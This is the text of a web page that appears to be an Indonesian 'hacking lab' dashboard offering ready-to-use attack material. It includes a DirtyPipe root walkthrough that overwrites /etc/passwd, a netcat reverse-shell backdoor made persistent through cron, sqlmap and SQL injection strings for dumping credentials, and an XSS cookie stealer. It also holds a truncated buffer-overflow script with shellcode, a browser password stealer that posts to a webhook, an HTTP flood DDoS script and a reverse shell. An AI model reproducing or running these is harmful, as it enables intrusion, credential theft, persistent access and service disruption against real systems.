🏠 DYCAL HACKING LAB
Selamat datang di Private Hacking Lab milik DYCAL! 💀
0
Tutorial Tersimpan
🔓
Exploit Berhasil
💀
Server Di-root
⚡
Script Siap Pakai
🔥 TUTORIAL TERBARU
👑 ROOT TUTORIAL - STEP BY STEP
🔓 STEP 1: SCANNING VULNERABILITY
# Scan kernel exploit
uname -a
cat /etc/os-release
# Check for DirtyPipe (CVE-2022-0847)
echo "VULNERABLE" > /tmp/test && /usr/bin/tee /tmp/test < /dev/null 2>/dev/null || echo "NOT VULNERABLE"
# Check for CVE-2024-1086
cat /proc/version | grep -i "5.14" && echo "⚠️ POTENTIAL VULNERABLE"
🔓 STEP 2: EXPLOIT DIRTYPIPE
# Download DirtyPipe exploit
wget https://raw.githubusercontent.com/lyx/exploits/main/dirtypipe.c -O /tmp/dirtypipe.c
gcc -o /tmp/dirtypipe /tmp/dirtypipe.c
/tmp/dirtypipe /etc/passwd "root::0:0:root:/root:/bin/bash"
# Check if success
cat /etc/passwd | grep "root::0"
🔓 STEP 3: STABILIZE SHELL
# Upgrade to fully interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Add persistent backdoor
echo '#!/bin/bash' > /usr/local/bin/dycalbackdoor
echo 'nc -e /bin/bash YOUR_IP 4444' >> /usr/local/bin/dycalbackdoor
chmod +x /usr/local/bin/dycalbackdoor
# Create cron persistence
echo "*/5 * * * * /usr/local/bin/dycalbackdoor" >> /etc/crontab
💀 HACKING TUTORIALS
🎯 SQL INJECTION - FULL TUTORIAL
# 1. FIND VULNERABLE PARAMETER
sqlmap -u "http://target.com/page?id=1" --dbs
# 2. ENUMERATE DATABASES
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
# 3. DUMP CREDENTIALS
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
# 4. MANUAL INJECTION
' UNION SELECT 1,2,user(),database(),@@version -- -
' OR '1'='1' UNION SELECT 1,2,3,4,5 -- -
' UNION SELECT null,username,password,null FROM users -- -
🌐 XSS - CROSS SITE SCRIPTING
# 1. BASIC XSS
<script>alert('DYCAL HACKED!')</script>
<img src=x onerror=alert('XSS')>
# 2. STEAL COOKIES
<script>fetch('http://your-server.com/cookie?c='+document.cookie)</script>
⚡ EXPLOIT SCRIPTS
🐍 Python Exploit - Buffer Overflow
import socket
import struct
target = "192.168.1.100"
port = 1337
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x53\x89\xe1\xb0\x0b\xcd\x80"
)
payload = b"A" * 1024
payload += struct.pack("
🐍 MALWARE SCRIPTS
🔑 Password Stealer
import os
import json
import requests
from cryptography.fernet import Fernet
class PasswordStealer:
def __init__(self, webhook_url):
self.webhook = webhook_url
self.key = Fernet.generate_key()
self.cipher = Fernet(self.key)
def steal_browser(self):
paths = {
'chrome': os.path.expanduser('~/.config/google-chrome/Default/Login Data'),
'firefox': os.path.expanduser('~/.mozilla/firefox/*.default-release/logins.json'),
}
passwords = {}
for browser, path in paths.items():
if os.path.exists(path):
passwords[browser] = self.encrypt_file(path)
return passwords
def send_to_server(self):
data = self.steal_browser()
requests.post(self.webhook, json=data)
stealer = PasswordStealer('http://your-server.com/steal')
stealer.send_to_server()
🔥 DDOS SCRIPTS
🌊 Layer 7 HTTP Flood
import socket
import threading
import random
import time
class DDoS:
def __init__(self, target, port):
self.target = target
self.port = port
self.running = True
def flood(self):
while self.running:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.target, self.port))
request = f"GET /?{random.randint(1,9999)} HTTP/1.1\r\n"
request += f"Host: {self.target}\r\n"
request += "User-Agent: Mozilla/5.0\r\n\r\n"
sock.send(request.encode())
sock.close()
except:
pass
def start(self, threads=500):
print(f"🔥 Starting DDoS on {self.target}:{self.port}")
for i in range(threads):
thread = threading.Thread(target=self.flood)
thread.daemon = True
thread.start()
attack = DDoS('target.com', 80)
attack.start(1000)
📝 CODE SNIPPETS
🐍 Reverse Shell Generator
#!/usr/bin/env python3
import sys, socket, subprocess, os
def reverse_shell(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python3 revshell.py IP PORT")
sys.exit(1)
reverse_shell(sys.argv[1], int(sys.argv[2]))